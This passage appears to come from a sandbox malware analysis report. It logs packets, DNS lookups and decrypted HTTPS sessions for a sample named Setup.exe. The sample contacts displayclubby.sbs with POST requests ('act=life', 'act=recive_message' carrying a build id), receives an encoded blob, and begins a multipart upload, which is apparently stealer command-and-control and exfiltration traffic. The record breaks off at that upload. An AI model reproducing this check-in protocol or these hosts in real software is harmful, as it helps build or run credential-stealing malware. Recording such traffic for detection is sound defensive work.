                                                                                                              Jan 5, 2025 18:58:22.150168896 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.150235891 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.152601004 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.152611017 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.152862072 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.155206919 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.155469894 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.155474901 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.682291031 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.682393074 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.682595968 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.682704926 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.682723999 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.737252951 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.737277031 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.737353086 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.737668037 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.737678051 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.191389084 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.191473961 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.202440023 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.202455997 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.202675104 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.206343889 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.206473112 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.206492901 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.623876095 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.623955011 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.624298096 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.624732971 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.624742031 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.624764919 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.624769926 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.761203051 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:23.761234045 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.761526108 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:23.762450933 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:23.762459993 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.491072893 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.491158009 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:24.492914915 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:24.492925882 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.493165016 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.494580984 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:24.539325953 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.753623009 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.753691912 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.753746986 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:24.754064083 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:24.754080057 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.754111052 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:24.754117012 CET44349748185.161.251.21192.168.2.5

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 5, 2025 18:58:13.472675085 CET6114453192.168.2.51.1.1.1
                                                                                                              Jan 5, 2025 18:58:13.485023975 CET53611441.1.1.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.627480984 CET6109753192.168.2.51.1.1.1
                                                                                                              Jan 5, 2025 18:58:23.736006975 CET53610971.1.1.1192.168.2.5

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 5, 2025 18:58:13.472675085 CET192.168.2.51.1.1.10xe229Standard query (0)displayclubby.sbsA (IP address)IN (0x0001)false
                                                                                                              Jan 5, 2025 18:58:23.627480984 CET192.168.2.51.1.1.10x932dStandard query (0)cegu.shopA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 5, 2025 18:58:13.485023975 CET1.1.1.1192.168.2.50xe229No error (0)displayclubby.sbs104.21.64.1A (IP address)IN (0x0001)false
                                                                                                              Jan 5, 2025 18:58:13.485023975 CET1.1.1.1192.168.2.50xe229No error (0)displayclubby.sbs104.21.80.1A (IP address)IN (0x0001)false
                                                                                                              Jan 5, 2025 18:58:13.485023975 CET1.1.1.1192.168.2.50xe229No error (0)displayclubby.sbs104.21.16.1A (IP address)IN (0x0001)false
                                                                                                              Jan 5, 2025 18:58:13.485023975 CET1.1.1.1192.168.2.50xe229No error (0)displayclubby.sbs104.21.112.1A (IP address)IN (0x0001)false
                                                                                                              Jan 5, 2025 18:58:13.485023975 CET1.1.1.1192.168.2.50xe229No error (0)displayclubby.sbs104.21.48.1A (IP address)IN (0x0001)false
                                                                                                              Jan 5, 2025 18:58:13.485023975 CET1.1.1.1192.168.2.50xe229No error (0)displayclubby.sbs104.21.32.1A (IP address)IN (0x0001)false
                                                                                                              Jan 5, 2025 18:58:13.485023975 CET1.1.1.1192.168.2.50xe229No error (0)displayclubby.sbs104.21.96.1A (IP address)IN (0x0001)false
                                                                                                              Jan 5, 2025 18:58:23.736006975 CET1.1.1.1192.168.2.50x932dNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • displayclubby.sbs
                                                                                                              • cegu.shop

                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.549721104.21.64.14436576C:\Users\user\Desktop\Setup.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-05 17:58:14 UTC264OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 8
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                              Data Ascii: act=life
                                                                                                              2025-01-05 17:58:14 UTC1133INHTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:14 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=vq17s761ffig0fn6ac4gqqr0h4; expires=Thu, 01 May 2025 11:44:53 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BYlyM3VrSuFcfyx6CsrRpJJ15Ol6Nd%2Fjs7ZAe7RPNZ3MD1sQTbjsS8Aya7MynNbX8Cpewc1oV63d5gOv9lM0jprhmOv7D4sP4Kwwdx%2BkUGgAEhl0OCZEHpRNOy%2B2Ssz%2FslX2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55af1ea9e440d-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1746&rtt_var=702&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1672394&cwnd=178&unsent_bytes=0&cid=1f0f9fb5acda0613&ts=767&x=0"
                                                                                                              2025-01-05 17:58:14 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                              Data Ascii: 2ok
                                                                                                              2025-01-05 17:58:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.549722104.21.64.14436576C:\Users\user\Desktop\Setup.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-05 17:58:15 UTC265OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 77
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:15 UTC77OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                              2025-01-05 17:58:15 UTC1125INHTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:15 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=hs3arq243mg8o3n3fq250rlmg4; expires=Thu, 01 May 2025 11:44:54 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UCVCC0NPN2bMrWLPZN9NjoccbrSBvbB9Cp9lZAg71QEXFLGdgZtpFriOOvPjoAd5X6IWpaEDZh5oE1L5ZdRjDFgWQjbzOODo%2F5o5aACxYld3Aa7rLAMsLqBHpMayfVY4L5vH8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55af9ab2d7c6a-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2023&rtt_var=766&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=978&delivery_rate=1423001&cwnd=218&unsent_bytes=0&cid=53902b8ce7b886e8&ts=503&x=0"
                                                                                                              2025-01-05 17:58:15 UTC244INData Raw: 33 61 38 38 0d 0a 4b 78 4b 68 36 76 7a 6c 45 65 63 65 4d 54 6d 4e 30 4b 51 52 4a 61 47 47 4f 7a 58 6a 66 45 78 41 5a 77 44 32 61 72 4c 6b 71 4b 56 51 4d 4e 66 49 78 74 45 39 78 57 31 55 47 37 65 32 78 58 31 57 78 4b 6f 5a 56 49 64 65 64 69 59 47 62 49 55 50 6e 73 62 65 79 41 6b 6f 78 34 75 51 6c 6e 54 4c 50 46 52 42 72 2b 72 2f 61 67 66 45 36 42 6b 50 77 52 6b 6d 49 67 5a 73 6c 41 76 5a 69 39 6a 4a 53 48 72 4e 6a 5a 53 41 63 6f 4e 2f 58 56 54 6f 74 63 46 77 54 38 2f 76 56 6c 32 4f 58 6d 42 69 41 6e 72 55 55 4a 43 70 7a 64 46 4b 58 38 43 5a 6c 38 64 73 79 32 55 54 58 4f 50 79 6e 6a 4e 45 78 4f 52 58 55 34 63 58 4a 43 67 50 5a 4a 55 4f 32 4a 54 42 77 30 4e 36 77 34 36 56 69 6e 75 58 63 6c 64 54 34 37 50 4c 63 41 65 4e 70 46
                                                                                                              Data Ascii: 3a88KxKh6vzlEeceMTmN0KQRJaGGOzXjfExAZwD2arLkqKVQMNfIxtE9xW1UG7e2xX1WxKoZVIdediYGbIUPnsbeyAkox4uQlnTLPFRBr+r/agfE6BkPwRkmIgZslAvZi9jJSHrNjZSAcoN/XVTotcFwT8/vVl2OXmBiAnrUUJCpzdFKX8CZl8dsy2UTXOPynjNExORXU4cXJCgPZJUO2JTBw0N6w46VinuXcldT47PLcAeNpF
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 35 50 77 55 5a 75 63 54 64 68 68 52 6e 46 69 39 72 42 43 57 2b 4e 6b 64 36 41 66 38 55 6b 45 31 50 6a 76 4d 4e 77 53 4d 54 6c 57 55 57 4f 48 69 30 71 44 57 61 65 42 39 2b 4a 78 4d 31 4f 65 4d 71 50 6b 59 42 37 67 33 4e 51 47 36 48 79 77 57 73 48 6d 36 52 35 52 34 49 64 4f 69 38 55 49 6f 74 47 79 63 62 4e 79 77 6b 6f 67 34 36 51 68 6e 36 46 62 6c 74 51 35 4c 66 55 65 45 37 4f 36 56 6c 61 69 78 45 74 49 67 4a 6f 6e 67 66 61 67 73 66 4b 54 33 44 44 79 4e 44 48 64 4a 30 38 43 78 76 4d 74 39 5a 30 53 39 57 6d 59 78 65 65 55 44 64 69 41 6d 37 55 55 4a 43 4f 7a 38 52 4b 65 38 79 4c 6c 6f 78 68 68 57 35 56 56 75 71 67 77 48 5a 4a 79 65 64 4c 58 59 38 59 4c 53 73 4f 61 35 45 50 31 4d 61 45 68 30 35 6f 67 39 44 65 70 6e 36 4f 63 46 6c 4d 37 2f 4c 5a 50 56 36 44 34
                                                                                                              Data Ascii: 5PwUZucTdhhRnFi9rBCW+Nkd6Af8UkE1PjvMNwSMTlWUWOHi0qDWaeB9+JxM1OeMqPkYB7g3NQG6HywWsHm6R5R4IdOi8UIotGycbNywkog46Qhn6FbltQ5LfUeE7O6VlaixEtIgJongfagsfKT3DDyNDHdJ08CxvMt9Z0S9WmYxeeUDdiAm7UUJCOz8RKe8yLloxhhW5VVuqgwHZJyedLXY8YLSsOa5EP1MaEh05og9Depn6OcFlM7/LZPV6D4
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 59 49 53 38 4a 49 74 70 49 31 35 36 4b 6e 77 6c 61 77 4a 79 64 6a 54 47 77 66 31 31 56 36 4b 53 47 62 41 6e 61 70 46 35 62 77 55 5a 75 4c 77 52 71 6b 68 72 66 69 38 6e 4a 52 33 2f 47 68 35 61 48 63 34 68 35 56 31 44 6b 73 63 74 33 56 63 6e 6b 55 56 4b 41 46 43 52 69 53 79 4b 54 45 4a 44 65 69 76 5a 65 65 34 47 39 6e 59 6c 39 67 6d 6f 54 52 4b 47 72 68 6e 52 4c 67 37 77 5a 57 6f 6b 62 4b 79 30 45 61 4a 6f 4e 32 6f 72 43 79 55 70 69 7a 49 79 65 69 33 75 50 63 56 31 66 35 37 76 4e 65 45 48 44 35 56 4d 58 7a 31 34 70 4f 6b 55 36 31 44 7a 58 69 73 66 49 43 30 58 41 68 70 43 41 5a 63 56 6a 48 55 4b 76 74 63 6f 7a 48 34 50 6f 55 46 65 4b 46 43 6f 69 41 6d 2b 52 43 39 65 46 78 38 42 44 66 73 53 4d 6b 6f 35 2b 67 33 78 55 58 2b 71 67 77 33 70 4c 7a 36 51 58 46 34
                                                                                                              Data Ascii: YIS8JItpI156KnwlawJydjTGwf11V6KSGbAnapF5bwUZuLwRqkhrfi8nJR3/Gh5aHc4h5V1Dksct3VcnkUVKAFCRiSyKTEJDeivZee4G9nYl9gmoTRKGrhnRLg7wZWokbKy0EaJoN2orCyUpizIyei3uPcV1f57vNeEHD5VMXz14pOkU61DzXisfIC0XAhpCAZcVjHUKvtcozH4PoUFeKFCoiAm+RC9eFx8BDfsSMko5+g3xUX+qgw3pLz6QXF4
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 48 43 4b 54 42 4a 44 65 69 73 35 41 59 73 32 47 6c 34 70 31 6a 58 74 64 56 75 53 30 7a 58 52 41 78 65 6c 52 57 6f 51 64 4c 79 59 50 63 4a 63 44 32 6f 76 41 68 77 63 77 78 4a 44 65 33 7a 4f 69 63 48 70 4c 39 4b 44 51 4d 31 69 4e 2f 52 6c 51 6a 56 35 32 59 67 5a 74 6e 51 66 59 6a 73 58 49 54 58 37 46 6a 70 4f 43 66 49 39 75 57 31 58 69 75 63 6c 34 56 63 50 70 58 56 75 46 46 69 55 6f 52 53 7a 55 44 38 6a 47 6b 6f 64 38 66 63 79 49 6e 5a 45 7a 6d 6a 4a 4b 47 2b 69 2b 68 69 73 48 7a 2b 70 5a 57 49 30 53 4a 53 6f 45 62 70 6f 50 31 59 2f 43 7a 31 74 78 78 34 43 66 69 58 79 45 65 46 5a 65 36 37 58 43 64 55 69 44 71 68 6c 51 6d 56 35 32 59 69 70 46 6f 55 72 78 76 49 72 59 42 32 6d 44 6a 35 4c 48 4b 38 56 77 55 46 66 6e 76 63 42 36 53 38 6e 74 55 6c 75 4b 47 69 49
                                                                                                              Data Ascii: HCKTBJDeis5AYs2Gl4p1jXtdVuS0zXRAxelRWoQdLyYPcJcD2ovAhwcwxJDe3zOicHpL9KDQM1iN/RlQjV52YgZtnQfYjsXITX7FjpOCfI9uW1Xiucl4VcPpXVuFFiUoRSzUD8jGkod8fcyInZEzmjJKG+i+hisHz+pZWI0SJSoEbpoP1Y/Cz1txx4CfiXyEeFZe67XCdUiDqhlQmV52YipFoUrxvIrYB2mDj5LHK8VwUFfnvcB6S8ntUluKGiI
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 77 6e 52 67 4e 6a 41 51 47 4c 4e 68 5a 47 50 65 34 78 39 56 31 37 69 74 4d 70 35 52 73 54 71 56 31 2f 42 55 47 34 6c 48 53 4c 4d 53 50 47 57 30 64 56 66 66 65 4b 46 6b 63 64 73 79 32 55 54 58 4f 50 79 6e 6a 4e 4f 30 65 42 55 52 59 67 5a 49 43 30 47 63 4a 55 46 32 35 54 4e 79 45 31 33 7a 34 36 52 67 58 4b 41 64 6c 39 63 36 72 6e 4a 66 77 65 4e 70 46 35 50 77 55 5a 75 44 41 35 78 67 77 76 65 6a 64 7a 63 43 57 2b 4e 6b 64 36 41 66 38 55 6b 45 31 6a 6b 75 63 4a 7a 53 38 50 67 56 46 65 54 45 53 6b 6c 44 47 6d 47 41 74 65 42 77 63 39 43 66 38 57 61 6b 6f 6c 68 67 47 35 42 47 36 48 79 77 57 73 48 6d 36 52 76 55 4a 45 4f 4c 57 41 30 64 4a 63 65 32 34 76 47 68 31 59 2b 32 73 69 5a 69 7a 50 64 50 46 56 55 35 72 48 4a 63 6b 37 50 36 56 78 65 68 42 38 6f 4a 67 39 6f
                                                                                                              Data Ascii: wnRgNjAQGLNhZGPe4x9V17itMp5RsTqV1/BUG4lHSLMSPGW0dVffeKFkcdsy2UTXOPynjNO0eBURYgZIC0GcJUF25TNyE13z46RgXKAdl9c6rnJfweNpF5PwUZuDA5xgwvejdzcCW+Nkd6Af8UkE1jkucJzS8PgVFeTESklDGmGAteBwc9Cf8WakolhgG5BG6HywWsHm6RvUJEOLWA0dJce24vGh1Y+2siZizPdPFVU5rHJck7P6VxehB8oJg9o
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 62 56 69 56 41 77 78 49 54 65 33 7a 4f 47 65 31 42 61 35 62 76 4b 66 45 44 48 39 6c 4e 51 6b 78 38 76 4b 51 68 75 6c 41 58 64 6a 4d 76 4f 52 48 7a 4f 6a 35 6d 49 64 73 55 79 45 31 7a 33 38 70 34 7a 5a 73 37 76 56 51 7a 62 58 6a 46 73 48 43 4b 54 42 4a 44 65 69 73 64 44 64 63 6d 46 6e 59 68 77 6c 33 31 56 53 65 2b 2f 7a 47 46 4e 79 4f 46 55 57 6f 77 64 4b 43 51 4f 62 6f 59 42 30 49 58 42 68 77 63 77 78 4a 44 65 33 7a 4f 6d 61 30 56 52 36 4c 37 51 65 45 62 41 38 6c 52 48 77 56 42 75 4d 77 4a 7a 31 46 44 47 6c 74 33 41 56 6a 37 61 79 4a 6d 4c 4d 39 30 38 56 56 4c 70 74 63 42 39 56 63 62 69 56 6c 69 49 46 79 6f 71 42 6d 4b 51 44 4e 65 44 79 63 74 43 64 38 43 48 6d 6f 35 39 6a 48 4d 54 46 61 2b 31 33 6a 4d 66 67 38 56 43 56 49 30 54 62 6a 31 4c 65 39 51 50 33
                                                                                                              Data Ascii: bViVAwxITe3zOGe1Ba5bvKfEDH9lNQkx8vKQhulAXdjMvORHzOj5mIdsUyE1z38p4zZs7vVQzbXjFsHCKTBJDeisdDdcmFnYhwl31VSe+/zGFNyOFUWowdKCQOboYB0IXBhwcwxJDe3zOma0VR6L7QeEbA8lRHwVBuMwJz1FDGlt3AVj7ayJmLM908VVLptcB9VcbiVliIFyoqBmKQDNeDyctCd8CHmo59jHMTFa+13jMfg8VCVI0Tbj1Le9QP3
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 4a 4b 49 4f 6f 6c 5a 46 32 67 6d 6f 52 62 75 79 38 79 48 52 52 67 2f 74 6d 47 63 45 66 62 6e 6f 38 65 39 51 65 6b 4e 36 59 69 51 6c 69 67 39 44 65 77 48 43 58 62 6c 56 59 2b 62 47 42 54 58 6e 6b 38 6c 4e 51 6b 52 6b 35 4c 55 55 73 31 41 65 51 33 76 4f 48 51 48 66 59 6d 59 69 4b 59 34 49 38 62 42 57 76 71 6f 59 72 42 2f 62 6e 56 31 6d 47 43 44 39 76 49 6e 53 65 44 38 43 42 33 63 67 4a 50 6f 4f 4f 33 74 38 67 79 7a 78 58 53 71 2f 71 6c 69 45 63 6c 72 63 4f 42 39 4d 42 59 44 74 46 64 4e 52 51 67 73 69 4b 31 51 6b 6f 67 38 2b 64 6c 57 47 44 66 30 56 59 71 49 7a 34 56 46 33 4f 34 6b 35 47 76 79 41 70 4f 41 68 6b 67 78 6d 63 6b 38 6e 4a 52 33 66 56 79 4e 44 48 66 4d 55 6b 61 68 75 6e 38 76 6b 39 42 39 75 6b 41 52 65 30 48 53 41 73 41 6e 53 46 52 66 65 63 78 38
                                                                                                              Data Ascii: JKIOolZF2gmoRbuy8yHRRg/tmGcEfbno8e9QekN6YiQlig9DewHCXblVY+bGBTXnk8lNQkRk5LUUs1AeQ3vOHQHfYmYiKY4I8bBWvqoYrB/bnV1mGCD9vInSeD8CB3cgJPoOO3t8gyzxXSq/qliEclrcOB9MBYDtFdNRQgsiK1Qkog8+dlWGDf0VYqIz4VF3O4k5GvyApOAhkgxmck8nJR3fVyNDHfMUkahun8vk9B9ukARe0HSAsAnSFRfecx8
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 79 4d 62 48 4e 49 5a 75 51 56 33 73 70 4d 55 30 65 66 33 44 56 31 43 41 43 44 34 31 43 6c 79 71 48 64 4f 49 78 4d 42 66 59 59 50 47 33 6f 67 7a 33 55 55 54 45 36 2b 4e 69 44 4e 66 67 37 77 5a 59 6f 49 51 49 43 55 54 63 39 6b 76 33 6f 48 4c 30 56 6c 6e 7a 4d 6a 51 78 33 58 46 4a 41 45 56 72 37 62 58 4d 78 2b 54 74 67 49 43 30 6b 6c 2b 63 42 6f 73 6a 55 6a 47 78 70 4b 56 42 7a 44 52 79 4d 62 48 4e 49 5a 75 51 56 33 73 70 4d 55 30 65 66 33 44 56 31 43 41 43 44 34 31 43 69 32 36 50 76 47 34 39 4e 4a 4b 66 73 32 50 69 4a 59 7a 79 7a 78 63 47 37 65 4c 68 6a 73 48 2f 4b 6f 5a 54 38 46 47 62 68 63 47 62 4a 6f 50 78 70 65 48 34 45 64 33 77 70 36 4f 6b 48 7a 4b 55 6d 56 36 72 2f 79 47 64 51 65 62 74 68 63 58 68 51 39 75 65 6c 55 77 7a 31 32 44 30 5a 71 56 56 6a 37
                                                                                                              Data Ascii: yMbHNIZuQV3spMU0ef3DV1CACD41ClyqHdOIxMBfYYPG3ogz3UUTE6+NiDNfg7wZYoIQICUTc9kv3oHL0VlnzMjQx3XFJAEVr7bXMx+TtgIC0kl+cBosjUjGxpKVBzDRyMbHNIZuQV3spMU0ef3DV1CACD41Ci26PvG49NJKfs2PiJYzyzxcG7eLhjsH/KoZT8FGbhcGbJoPxpeH4Ed3wp6OkHzKUmV6r/yGdQebthcXhQ9uelUwz12D0ZqVVj7
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 79 76 46 55 55 46 63 2f 37 47 47 50 51 66 50 70 41 45 58 6a 41 77 70 4d 67 59 75 6b 78 4c 58 78 74 57 4a 55 44 44 56 79 4d 62 55 50 63 56 75 45 77 4f 76 39 63 68 2b 52 73 44 71 57 6b 57 54 47 43 30 30 42 69 57 71 4e 76 32 55 7a 64 64 4b 4d 76 4b 46 6d 70 46 6d 68 6d 78 55 5a 64 47 66 31 48 52 58 77 4b 5a 31 55 49 77 53 45 42 77 79 63 35 4d 59 6b 71 44 4a 30 55 6f 77 6a 63 69 47 78 79 76 46 55 55 46 63 2f 37 47 45 58 30 44 4f 36 42 6c 49 7a 77 64 75 4e 45 55 36 78 30 61 51 6c 49 71 66 43 54 66 41 6d 6f 79 42 63 4a 4e 2f 46 47 58 52 6e 39 52 30 56 38 43 6d 61 46 71 46 43 44 73 68 46 57 57 71 4e 76 32 55 7a 64 64 4b 4d 75 61 79 33 4c 5a 6c 68 6e 78 64 58 4b 2f 38 68 6d 73 48 6d 36 52 30 52 59 59 4f 4c 57 41 67 57 4e 59 35 78 6f 58 4b 79 55 34 77 6a 63 69 53
                                                                                                              Data Ascii: yvFUUFc/7GGPQfPpAEXjAwpMgYukxLXxtWJUDDVyMbUPcVuEwOv9ch+RsDqWkWTGC00BiWqNv2UzddKMvKFmpFmhmxUZdGf1HRXwKZ1UIwSEBwyc5MYkqDJ0UowjciGxyvFUUFc/7GEX0DO6BlIzwduNEU6x0aQlIqfCTfAmoyBcJN/FGXRn9R0V8CmaFqFCDshFWWqNv2UzddKMuay3LZlhnxdXK/8hmsHm6R0RYYOLWAgWNY5xoXKyU4wjciS


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.549723104.21.64.14436576C:\Users\user\Desktop\Setup.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-05 17:58:16 UTC277OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=EH35OOWNHHMN
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 12797
                                                                                                              Host: displayclubby.sbs
